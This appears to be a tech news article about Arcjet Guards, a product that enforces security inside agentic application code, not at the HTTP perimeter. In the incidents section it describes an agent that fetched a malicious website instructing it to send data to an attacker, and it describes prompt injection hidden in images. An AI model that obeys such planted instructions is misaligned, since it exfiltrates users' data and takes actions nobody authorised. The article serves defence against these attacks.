Introduction
As artificial intelligence agents increasingly take over critical application tasks—such as reading files, loading web pages, and processing queue messages—the security tools that once provided robust defenses are losing their effectiveness. Traditional security measures built around HTTP boundaries, including web application firewalls (WAFs), proxies, and middleware, can no longer see the threats that now travel through internal code paths. Arcjet, a San Francisco-based runtime security company, aims to close this gap with its new offering: Guards.
This article explores the evolving attack surface in agentic systems and explains how Arcjet Guards enforces security where it actually matters—inside the application logic itself.
The Gap: Why Traditional Security Fails for Agentic Systems
Traditional application security assumes a clear request boundary. An HTTP request arrives at a front door, passes through middleware and inspection, then reaches the application code. That model worked well for conventional web applications. But agentic systems operate very differently.
Where Input Enters Without HTTP
As Arcjet CEO David Mytton explained in a blog post, “An agent tool handler receives untrusted input as a function argument, not a request body. A queue consumer pulls a message off a broker, never touching a router. A multi-agent pipeline passes state from one step to the next through shared memory or a workflow engine.” None of these interactions cross a network boundary that a proxy can detect.
The result is a massive blind spot. WAFs and AI gateways sitting at the network edge cannot inspect function arguments, queue messages, or inter-agent state transfers. Security teams lose visibility into the very points where attacks are most likely to strike.
Concrete Consequences: Real Incidents and Deepening Blind Spots
The problem isn’t theoretical. Mytton cited a real incident where an AI agent fetched a maliciously crafted website. The site’s content instructed the agent to send data to an external attacker. The WAF protecting the chat interface upstream never saw the malicious action because the attack took place inside the agent’s internal processing—not in the HTTP layer.
Prompt Injection and Beyond
Text instructions hidden inside images that the agent loads represent another dangerous vector. Attackers can craft such images to inject prompts that redirect the agent’s behavior. Mytton noted in a briefing with The New Stack, “You’ve got all your permissions set up correctly on the chat interface, but by prompt injecting agents right behind the scenes, you can get it to take actions that it wasn’t expecting.”
The Context Problem
Visibility isn’t the only issue. Even if a proxy could see a request, it lacks the context needed to assess risk. Mytton wrote, “A proxy can see the request. It can’t see the identity, the session, the business logic, or the budget.” Inside an agentic system, the challenge is even steeper—a proxy cannot see a tool call at all, because a tool call is not an HTTP request.
What Guards Does: Runtime Enforcement Inside the Code
Arcjet Guards rethinks where security policies are applied. Instead of inspecting traffic at the perimeter, Guards integrates directly into the application’s SDK model. Developers define security rules in the same codebase as the feature itself. That means protection ships with the code and is reviewed in the same pull request as the business logic.
Enforcement at the Point of Untrusted Input
The enforcement point moves to wherever untrusted input arrives—whether that’s a function argument, a queue message, or a workflow step. Guards runs inside the application, where it has full access to identity, session, business logic, and budget information. This context-rich approach allows for far more precise and effective security decisions.
Integration with Existing Development Workflows
Because Guards uses Arcjet’s existing SDK, developers can add security rules as code comments or configuration alongside their feature code. No separate security tooling or proxy configuration is required. As Mytton stated, “Security has to live where the code lives. For agentic systems, that means inside the tool calls an agent makes.”
Conclusion: A New Model for Agent Security
Arcjet Guards represents a necessary evolution in application security. As AI agents become more autonomous and handle more sensitive operations, the old perimeter-based approach is no longer sufficient. By embedding enforcement directly into the code paths that agents use, Guards closes the visibility and context gaps that traditional WAFs leave open. For development teams building agentic applications—whether for file processing, web scraping, or multi-step workflows—Guards offers a way to secure the invisible attack surface without slowing down innovation.